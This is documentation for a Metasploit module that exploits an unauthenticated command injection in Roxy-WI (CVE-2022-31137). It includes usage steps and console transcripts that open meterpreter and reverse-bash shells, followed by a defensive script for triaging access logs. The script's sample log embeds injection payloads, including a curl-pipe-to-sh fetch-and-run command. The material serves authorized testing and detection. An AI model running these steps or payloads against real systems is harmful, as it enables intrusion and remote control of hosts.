## Vulnerable Application

### Description

This module exploits a command injection vulnerability in Roxy-WI to achieve remote code execution. An unauthenticated user can execute terminal commands in the context of the web server user.

In versions 6.1.1.0 and earlier, an unauthenticated user can call some administrative functions without any credentials. Depending on the function reached, an adversary can change parts of the web page, hijack an administrator account, or execute operating system commands in the context of the web server user.

Technical details about the vulnerability (CVE-2022-31137) can be found [here](https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137/).

### Setup

Roxy-WI requires Python and a web server to run. Please visit the following URL to find out the required Python version and other packages:

[https://roxy-wi.org/installation.py](https://roxy-wi.org/installation.py)

```
git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi
chmod +x /var/www/haproxy-wi/app/*.py
sudo /var/www/haproxy-wi/app/create_db.py
chown -R www-data:www-data /var/www/haproxy-wi
```

## Options

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: `use exploit/linux/http/roxy_wi_exec`
4. Set `RHOST`
5. Set `LHOST`
6. Do: `run`
7. You should get a shell.
8. **Verify** that you get a `meterpreter` session (with the default Python payload) or a command shell (with a `cmd` payload). No `USERNAME` or `PASSWORD` is needed: the vulnerability is unauthenticated.

## Targets

### 0 `Python payload`

### 1 `Command payload`

## Scenarios

```
msf6 > use exploit/linux/http/roxy_wi_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300

meterpreter > ls
Listing: /var/www/haproxy-wi/app
================================

Mode  Size  Type  Last modified  Name
----  ----  ----  -------------  ----
```

You can also use `cmd` payloads.

```
msf6 > use exploit/linux/http/roxy_wi_exec
[*] Using configured payload python/meterpreter/reverse_tcp
msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116
RHOST => 192.168.56.116
msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf6 exploit(linux/http/roxy_wi_exec) > set payload cmd/unix/reverse_bash
payload => cmd/unix/reverse_bash
msf6 exploit(linux/http/roxy_wi_exec) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Checking if 192.168.56.116:443 is vulnerable!
[*] Generating payload.
[*] Trying to detect command injection vulnerability.
[+] Exploit successfully executed.
[*] Sending stage (40168 bytes) to 192.168.56.116
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:35490) at 2022-07-19 14:13:41 +0300

id
uid=1000(xxx) gid=1000(xxx) groups=1000(xxx)
```
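The Description above says the bug is a command injection reachable without credentials through Roxy-WI's web handlers, which means the only trace on the server side is the web server's access log plus whatever the CGI process spawned. The following script is an added example (not part of the Metasploit module, Roxy-WI, or the advisory) of how a defender could triage such a log for injection attempts. It assumes the handlers are the `.py` files served under `/app/` (matching the install path on this page), that the web server writes Apache/nginx "combined" format, and that the log lines, endpoint names and parameter names embedded in it are constructed placeholders, not the real vulnerable endpoint.

```python
"""Triage a web-server access log for command-injection attempts against
Roxy-WI CGI endpoints.

Added example for this page; not part of the Metasploit module or Roxy-WI.
Assumptions: handlers live under /app/*.py, log is Apache/nginx "combined"
format, and SAMPLE_LOG below is constructed (endpoint and parameter names
are placeholders, not the real vulnerable ones).
"""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Constructed sample lines (not real traffic).
SAMPLE_LOG = """\
192.168.56.1 - - [19/Jul/2022:14:13:40 +0300] "GET /app/overview.py HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
192.168.56.1 - - [19/Jul/2022:14:13:41 +0300] "GET /app/options.py?act=ping&ip=10.0.0.1 HTTP/1.1" 200 88 "-" "python-requests/2.28"
192.168.56.1 - - [19/Jul/2022:14:13:41 +0300] "GET /app/options.py?act=ping&ip=10.0.0.1%3Bid HTTP/1.1" 200 140 "-" "python-requests/2.28"
192.168.56.1 - - [19/Jul/2022:14:13:42 +0300] "POST /app/options.py HTTP/1.1" 200 140 "-" "python-requests/2.28"
10.0.0.7 - - [19/Jul/2022:14:14:00 +0300] "GET /app/config.py?service=haproxy%24(curl%20http://x/s%7Csh) HTTP/1.1" 500 0 "-" "curl/7.81"
"""

# Apache/nginx "combined" format: client, ident, user, [timestamp], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: Roxy-WI's CGI handlers are the .py files under /app/.
ROXY_ENDPOINT_RE = re.compile(r'^/app/[\w.-]+\.py$')
# Metacharacters that let a value break out of a shell command string
# built by a CGI handler (separators, pipes, backgrounding, substitution).
METACHARS = re.compile(r'[;|&`\n]|\$\(|\$\{')


def parse_line(line):
    """Return a dict with src/ts/method/path/params/status, or None if unparseable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec['target'])
    rec['path'] = parts.path
    rec['params'] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def suspicious_params(params):
    """Return (name, decoded_value, matched_metachar) for every parameter that
    contains a shell metacharacter after URL decoding."""
    hits = []
    for name, value in params:
        # parse_qsl already decoded once; a second pass catches double-encoding.
        decoded = unquote_plus(value)
        m = METACHARS.search(decoded)
        if m:
            hits.append((name, decoded, m.group(0)))
    return hits


def triage(log_text):
    """Scan log lines; flag Roxy-WI endpoint requests with metacharacters in
    their query, and POSTs whose body (not logged) cannot be reviewed here."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        rec = parse_line(line)
        if rec is None or not ROXY_ENDPOINT_RE.match(rec['path']):
            continue
        hits = suspicious_params(rec['params'])
        base = {'line': n, 'src': rec['src'], 'path': rec['path']}
        if hits:
            findings.append({**base, 'kind': 'metachar', 'hits': hits})
        elif rec['method'] == 'POST':
            # Body parameters never reach the access log: correlate with process
            # ancestry instead (a shell spawned by the web server's Python CGI).
            findings.append({**base, 'kind': 'post_body_not_logged', 'hits': []})
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_LOG):
        print(f"line {f['line']}: {f['kind']} from {f['src']} -> {f['path']} {f['hits']}")
```

The access log is only half the picture: GET query strings are visible, but a POSTed injection leaves nothing but the endpoint name, which is why the script reports those separately rather than clearing them. Pair it with process auditing for shells whose parent is the web server's Python interpreter running as `www-data`, and treat any match against the vulnerable endpoint as a hijacked-host scenario, since the Description notes the same flaw also allows admin-account takeover.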